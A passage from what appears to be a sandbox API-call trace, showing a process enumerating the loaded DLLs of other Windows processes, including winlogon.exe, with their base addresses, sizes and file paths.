lpBaseName="sfc_os.DLL") returned 0xa [0076.460] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa0c0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sfc_os.DLL" (normalized: "c:\\windows\\system32\\sfc_os.dll")) returned 0x1e [0076.463] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc940000, lpmodinfo=0x24fdf40, cb=0x18 | out: lpmodinfo=0x24fdf40*(lpBaseOfDll=0x7fefc940000, SizeOfImage=0xc000, EntryPoint=0x7fefc941064)) returned 1 [0076.466] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc940000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0076.468] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc940000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\VERSION.dll" (normalized: "c:\\windows\\system32\\version.dll")) returned 0x1f [0076.471] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb270000, lpmodinfo=0x2500100, cb=0x18 | out: lpmodinfo=0x2500100*(lpBaseOfDll=0x7fefb270000, SizeOfImage=0x27000, EntryPoint=0x7fefb2798bc)) returned 1 [0076.473] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb270000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="IPHLPAPI.DLL") returned 0xc [0076.476] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb270000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")) returned 0x20 [0076.479] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb260000, lpmodinfo=0x25022d0, cb=0x18 | out: lpmodinfo=0x25022d0*(lpBaseOfDll=0x7fefb260000, SizeOfImage=0xb000, EntryPoint=0x7fefb261198)) returned 1 [0076.481] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb260000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0076.484] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb260000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINNSI.DLL" (normalized: "c:\\windows\\system32\\winnsi.dll")) returned 0x1e [0076.487] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff970000, lpmodinfo=0x2504490, cb=0x18 | out: lpmodinfo=0x2504490*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0076.490] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff970000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0076.493] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff970000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0076.495] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcb00000, lpmodinfo=0x2506650, cb=0x18 | out: lpmodinfo=0x2506650*(lpBaseOfDll=0x7fefcb00000, SizeOfImage=0x1b000, EntryPoint=0x7fefcb02068)) returned 1 [0076.498] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcb00000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="GPAPI.dll") returned 0x9 [0076.501] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcb00000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GPAPI.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")) returned 0x1d [0076.504] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff2d0000, lpmodinfo=0x2508810, cb=0x18 | out: lpmodinfo=0x2508810*(lpBaseOfDll=0x7feff2d0000, SizeOfImage=0x71000, EntryPoint=0x7feff2e1e20)) returned 1 [0076.507] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff2d0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0076.510] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff2d0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SHLWAPI.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0076.513] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcc70000, lpmodinfo=0x250a9d0, cb=0x18 | out: lpmodinfo=0x250a9d0*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0076.517] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcc70000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0076.522] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcc70000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0076.525] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefce90000, lpmodinfo=0x250cb90, cb=0x18 | out: lpmodinfo=0x250cb90*(lpBaseOfDll=0x7fefce90000, SizeOfImage=0x5b000, EntryPoint=0x7fefce96940)) returned 1 [0076.528] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefce90000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="DNSAPI.dll") returned 0xa [0076.531] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefce90000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DNSAPI.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0076.534] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9160000, lpmodinfo=0x250ed50, cb=0x18 | out: lpmodinfo=0x250ed50*(lpBaseOfDll=0x7fef9160000, SizeOfImage=0x15000, EntryPoint=0x7fef91612a0)) returned 1 [0076.537] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9160000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="napinsp.dll") returned 0xb [0076.540] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9160000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\napinsp.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")) returned 0x1f [0076.543] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9180000, lpmodinfo=0x2510f10, cb=0x18 | out: lpmodinfo=0x2510f10*(lpBaseOfDll=0x7fef9180000, SizeOfImage=0x19000, EntryPoint=0x7fef918177c)) returned 1 [0076.547] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9180000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="pnrpnsp.dll") returned 0xb [0076.550] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9180000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")) returned 0x1f [0076.553] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd010000, lpmodinfo=0x25130d0, cb=0x18 | out: lpmodinfo=0x25130d0*(lpBaseOfDll=0x7fefd010000, SizeOfImage=0x55000, EntryPoint=0x7fefd011054)) returned 1 [0076.556] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd010000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0076.559] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd010000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")) returned 0x1f [0076.562] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9220000, lpmodinfo=0x2515290, cb=0x18 | out: lpmodinfo=0x2515290*(lpBaseOfDll=0x7fef9220000, SizeOfImage=0xb000, EntryPoint=0x7fef92212e0)) returned 1 [0076.565] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9220000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="winrnr.dll") returned 0xa [0076.571] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9220000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")) returned 0x1e [0076.574] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefca10000, lpmodinfo=0x2517450, cb=0x18 | out: lpmodinfo=0x2517450*(lpBaseOfDll=0x7fefca10000, SizeOfImage=0x7000, EntryPoint=0x7fefca114b0)) returned 1 [0076.578] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefca10000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wshtcpip.dll") returned 0xc [0076.581] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefca10000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wshtcpip.dll" (normalized: "c:\\windows\\system32\\wshtcpip.dll")) returned 0x20 [0076.584] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd000000, lpmodinfo=0x2519620, cb=0x18 | out: lpmodinfo=0x2519620*(lpBaseOfDll=0x7fefd000000, SizeOfImage=0x7000, EntryPoint=0x7fefd00142c)) returned 1 [0076.588] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd000000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wship6.dll") returned 0xa [0076.591] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd000000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")) returned 0x1e [0076.594] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9530000, lpmodinfo=0x251b7e0, cb=0x18 | out: lpmodinfo=0x251b7e0*(lpBaseOfDll=0x7fef9530000, SizeOfImage=0x8000, EntryPoint=0x7fef9531414)) returned 1 [0076.598] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9530000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="rasadhlp.dll") returned 0xc [0076.602] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9530000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")) returned 0x20 [0076.606] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefac50000, lpmodinfo=0x251d9b0, cb=0x18 | out: lpmodinfo=0x251d9b0*(lpBaseOfDll=0x7fefac50000, SizeOfImage=0x53000, EntryPoint=0x7fefac52b98)) returned 1 [0076.609] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefac50000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="fwpuclnt.dll") returned 0xc [0076.613] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefac50000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\fwpuclnt.dll" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")) returned 0x20 [0076.617] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefac20000, lpmodinfo=0x251fb98, cb=0x18 | out: lpmodinfo=0x251fb98*(lpBaseOfDll=0x7fefac20000, SizeOfImage=0x11000, EntryPoint=0x7fefac216ac)) returned 1 [0076.620] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefac20000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="dhcpcsvc6.DLL") returned 0xd [0076.624] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefac20000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dhcpcsvc6.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")) returned 0x21 [0076.627] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefac00000, lpmodinfo=0x2521d68, cb=0x18 | out: lpmodinfo=0x2521d68*(lpBaseOfDll=0x7fefac00000, SizeOfImage=0x18000, EntryPoint=0x7fefac01bf8)) returned 1 [0076.631] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefac00000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="dhcpcsvc.DLL") returned 0xc [0076.635] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefac00000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dhcpcsvc.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")) returned 0x20 [0076.639] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x218 [0076.639] EnumProcessModules (in: hProcess=0x218, lphModule=0x2525560, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x2525560, lpcbNeeded=0x23ee40) returned 1 [0076.642] GetModuleInformation (in: hProcess=0x218, hModule=0xffe00000, lpmodinfo=0x25257d0, cb=0x18 | out: lpmodinfo=0x25257d0*(lpBaseOfDll=0xffe00000, SizeOfImage=0x62000, EntryPoint=0xffe108d8)) returned 1 [0076.642] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xffe00000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="winlogon.exe") returned 0xc [0076.642] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xffe00000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe")) returned 0x20 [0076.643] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x25279d8, cb=0x18 | out: lpmodinfo=0x25279d8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0076.643] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0076.643] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0076.644] GetModuleInformation (in: hProcess=0x218, hModule=0x77710000, lpmodinfo=0x2529bb0, cb=0x18 | out: lpmodinfo=0x2529bb0*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0076.644] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77710000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0076.645] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77710000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0076.645] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd910000, lpmodinfo=0x252bd80, cb=0x18 | out: lpmodinfo=0x252bd80*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0076.646] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd910000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0076.647] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd910000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0076.647] GetModuleInformation (in: hProcess=0x218, hModule=0x77610000, lpmodinfo=0x252df50, cb=0x18 | out: lpmodinfo=0x252df50*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0076.648] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77610000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0076.648] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77610000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0076.649] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff1c0000, lpmodinfo=0x2530168, cb=0x18 | out: lpmodinfo=0x2530168*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0076.650] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff1c0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0076.651] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff1c0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0076.651] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff350000, lpmodinfo=0x2532328, cb=0x18 | out: lpmodinfo=0x2532328*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0076.652] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff350000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0076.653] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff350000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0076.654] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff690000, lpmodinfo=0x25344d8, cb=0x18 | out: lpmodinfo=0x25344d8*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0076.655] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff690000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0076.655] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff690000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0076.656] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff100000, lpmodinfo=0x2536698, cb=0x18 | out: lpmodinfo=0x2536698*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0076.657] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff100000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0076.658] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff100000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0076.659] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd720000, lpmodinfo=0x25388f0, cb=0x18 | out: lpmodinfo=0x25388f0*(lpBaseOfDll=0x7fefd720000, SizeOfImage=0x3d000, EntryPoint=0x7fefd7218f4)) returned 1 [0076.659] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd720000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="WINSTA.dll") returned 0xa [0076.663] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd720000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINSTA.dll" (normalized: "c:\\windows\\system32\\winsta.dll")) returned 0x1e [0076.663] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdb50000, lpmodinfo=0x253aab0, cb=0x18 | out: lpmodinfo=0x253aab0*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0076.664] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdb50000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0076.665] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdb50000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0076.666] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff400000, lpmodinfo=0x253cc70, cb=0x18 | out: lpmodinfo=0x253cc70*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0076.667] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff400000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0076.668] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff400000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0076.669] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9d0000, lpmodinfo=0x253ee30, cb=0x18 | out: lpmodinfo=0x253ee30*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0076.670] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9d0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0076.671] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9d0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0076.672] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff430000, lpmodinfo=0x2540ff0, cb=0x18 | out: lpmodinfo=0x2540ff0*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0076.673] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff430000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0076.674] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff430000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0076.675] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefee80000, lpmodinfo=0x25431c0, cb=0x18 | out: lpmodinfo=0x25431c0*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0076.677] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefee80000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0076.678] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefee80000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0076.679] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd780000, lpmodinfo=0x2545380, cb=0x18 | out: lpmodinfo=0x2545380*(lpBaseOfDll=0x7fefd780000, SizeOfImage=0xf000, EntryPoint=0x7fefd7819b0)) returned 1 [0076.681] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd780000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0076.682] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd780000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")) returned 0x1f [0076.683] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd760000, lpmodinfo=0x2547540, cb=0x18 | out: lpmodinfo=0x2547540*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0076.684] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd760000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0076.686] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd760000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0076.687] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb310000, lpmodinfo=0x2549828, cb=0x18 | out: lpmodinfo=0x2549828*(lpBaseOfDll=0x7fefb310000, SizeOfImage=0xa000, EntryPoint=0x7fefb3144d0)) returned 1 [0076.688] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb310000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="UXINIT.dll") returned 0xa [0076.690] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb310000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\UXINIT.dll" (normalized: "c:\\windows\\system32\\uxinit.dll")) returned 0x1e [0076.691] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc0d0000, lpmodinfo=0x254b9e8, cb=0x18 | out: lpmodinfo=0x254b9e8*(lpBaseOfDll=0x7fefc0d0000, SizeOfImage=0x56000, EntryPoint=0x7fefc0dbbc0)) returned 1 [0076.694] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc0d0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="UxTheme.dll") returned 0xb [0076.695] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc0d0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\UxTheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")) returned 0x1f [0076.696] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd070000, lpmodinfo=0x254dbc0, cb=0x18 | out: lpmodinfo=0x254dbc0*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0076.698] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd070000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0076.699] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd070000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0076.701] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcd70000, lpmodinfo=0x254fd80, cb=0x18 | out: lpmodinfo=0x254fd80*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0076.702] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcd70000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0076.704] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcd70000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0076.705] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd670000, lpmodinfo=0x2551f40, cb=0x18 | out: lpmodinfo=0x2551f40*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0076.707] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd670000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0076.709] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd670000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0076.710] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbb30000, lpmodinfo=0x2554110, cb=0x18 | out: lpmodinfo=0x2554110*(lpBaseOfDll=0x7fefbb30000, SizeOfImage=0x12a000, EntryPoint=0x7fefbb33810)) returned 1 [0076.712] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbb30000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="WindowsCodecs.dll") returned 0x11 [0076.714] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbb30000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll")) returned 0x25 [0076.715] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff760000, lpmodinfo=0x25562f0, cb=0x18 | out: lpmodinfo=0x25562f0*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0076.717] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff760000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0076.719] 